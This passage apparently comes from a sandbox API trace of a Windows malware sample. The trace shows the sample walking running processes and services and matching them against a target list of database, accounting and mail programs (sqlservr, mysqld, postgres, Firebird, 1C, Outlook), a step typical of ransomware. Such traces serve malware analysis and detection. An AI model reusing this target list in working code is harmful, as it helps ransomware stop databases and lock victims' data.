lpString2="smss.exe") returned -1 [0273.052] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0273.052] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0273.052] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0273.052] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0273.052] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0273.052] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.053] lstrlenW (lpString="csrss.exe") returned 9 [0273.053] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0273.053] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0273.053] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0273.053] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0273.053] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0273.053] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0273.053] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0273.053] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0273.053] lstrlenW (lpString="wininit.exe") returned 11 [0273.053] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0273.053] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0273.053] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0273.053] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0273.053] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0273.053] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0273.053] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0273.053] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.054] lstrlenW (lpString="csrss.exe") returned 9 [0273.054] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0273.054] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0273.054] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0273.054] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0273.054] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0273.054] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0273.054] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0273.054] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0273.054] lstrlenW (lpString="winlogon.exe") returned 12 [0273.054] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0273.054] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0273.054] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0273.054] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0273.054] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0273.054] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0273.054] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0273.054] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0273.055] lstrlenW (lpString="services.exe") returned 12 [0273.055] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0273.055] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0273.055] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0273.055] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0273.055] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0273.055] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0273.055] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0273.055] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0273.055] lstrlenW (lpString="lsass.exe") returned 9 [0273.055] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0273.055] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0273.055] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0273.055] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0273.055] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0273.055] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0273.055] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0273.055] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0273.056] lstrlenW (lpString="lsm.exe") returned 7 [0273.056] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0273.056] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0273.056] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0273.056] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0273.056] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0273.056] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0273.056] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0273.056] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.056] lstrlenW (lpString="svchost.exe") returned 11 [0273.056] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.056] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.056] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.056] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.056] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.056] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.056] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.056] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.057] lstrlenW (lpString="svchost.exe") returned 11 [0273.057] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.057] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.057] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.057] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.057] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.057] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.057] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.057] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.057] lstrlenW (lpString="svchost.exe") returned 11 [0273.057] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.057] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.057] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.057] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.057] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.057] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.057] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.057] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.058] lstrlenW (lpString="svchost.exe") returned 11 [0273.058] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.058] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.058] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.058] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.058] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.058] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.058] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.058] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.058] lstrlenW (lpString="svchost.exe") returned 11 [0273.058] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.058] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.058] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.058] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0273.059] lstrlenW (lpString="audiodg.exe") returned 11 [0273.059] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.059] lstrlenW (lpString="svchost.exe") returned 11 [0273.059] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0273.059] lstrlenW (lpString="userinit.exe") returned 12 [0273.059] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0273.060] lstrlenW (lpString="explorer.exe") returned 12 [0273.060] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0273.060] lstrlenW (lpString="dwm.exe") returned 7 [0273.060] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.060] lstrlenW (lpString="svchost.exe") returned 11 [0273.060] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0273.060] lstrlenW (lpString="agent1c.exe") returned 11 [0273.061] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0273.061] lstrlenW (lpString="spoolsv.exe") returned 11 [0273.061] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0273.064] lstrlenW (lpString="reader_sl.exe") returned 13 [0273.064] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0273.064] lstrlenW (lpString="dllhost.exe") returned 11 [0273.064] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0273.064] lstrlenW (lpString="taskhost.exe") returned 12 [0273.064] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.065] lstrlenW (lpString="svchost.exe") returned 11 [0273.065] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0273.065] CloseHandle (hObject=0x37c) returned 1 [0273.065] Sleep (dwMilliseconds=0x1f4) [0273.872] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x42dc6a0 [0273.940] EnumServicesStatusExW (in: hSCManager=0x42dc6a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0273.941] GetLastError () returned 0xea [0273.941] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc9a) returned 0x4262fb8 [0273.941] EnumServicesStatusExW (in: hSCManager=0x42dc6a0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4262fb8, cbBufSize=0xc9a, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4262fb8, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0273.941] CloseServiceHandle (hSCObject=0x42dc6a0) returned 1 [0273.941] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0273.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0273.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0273.941] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0273.941] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0273.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0273.941] lstrlenW (lpString="AudioSrv") returned 8 [0273.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0273.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0273.941] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0273.941] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0273.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0273.941] lstrlenW (lpString="BFE") returned 3 [0273.941] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0273.941] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0273.942] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0273.942] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0273.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0273.942] lstrlenW (lpString="CryptSvc") returned 8 [0273.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0273.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0273.942] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0273.942] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0273.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0273.942] lstrlenW (lpString="CscService") returned 10 [0273.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0273.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0273.942] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0273.942] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0273.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0273.942] lstrlenW (lpString="DcomLaunch") returned 10 [0273.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0273.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0273.942] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0273.942] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0273.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0273.942] lstrlenW (lpString="Dhcp") returned 4 [0273.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0273.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0273.942] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0273.942] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0273.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0273.942] lstrlenW (lpString="Dnscache") returned 8 [0273.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0273.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0273.942] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0273.942] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0273.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0273.942] lstrlenW (lpString="DPS") returned 3 [0273.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0273.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0273.942] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0273.943] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0273.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0273.943] lstrlenW (lpString="eventlog") returned 8 [0273.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0273.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0273.943] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0273.943] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0273.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0273.943] lstrlenW (lpString="EventSystem") returned 11 [0273.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0273.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0273.943] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0273.943] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0273.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0273.943] lstrlenW (lpString="gpsvc") returned 5 [0273.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0273.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0273.943] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0273.943] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0273.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0273.943] lstrlenW (lpString="LanmanWorkstation") returned 17 [0273.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0273.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0273.943] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0273.943] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0273.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0273.943] lstrlenW (lpString="lmhosts") returned 7 [0273.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0273.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0273.943] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0273.943] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0273.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0273.943] lstrlenW (lpString="MMCSS") returned 5 [0273.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0273.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0273.944] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0273.944] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0273.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0273.944] lstrlenW (lpString="MpsSvc") returned 6 [0273.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0273.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0273.944] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0273.944] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0273.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0273.944] lstrlenW (lpString="NlaSvc") returned 6 [0273.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0273.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0273.944] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0273.944] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0273.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0273.944] lstrlenW (lpString="nsi") returned 3 [0273.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0273.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0273.944] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0273.944] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0273.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0273.944] lstrlenW (lpString="PcaSvc") returned 6 [0273.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0273.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0273.944] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0273.944] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0273.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0273.944] lstrlenW (lpString="PlugPlay") returned 8 [0273.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0273.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0273.944] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0273.944] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0273.944] lstrcmpiW (lpString1="sqlserveradhelper", 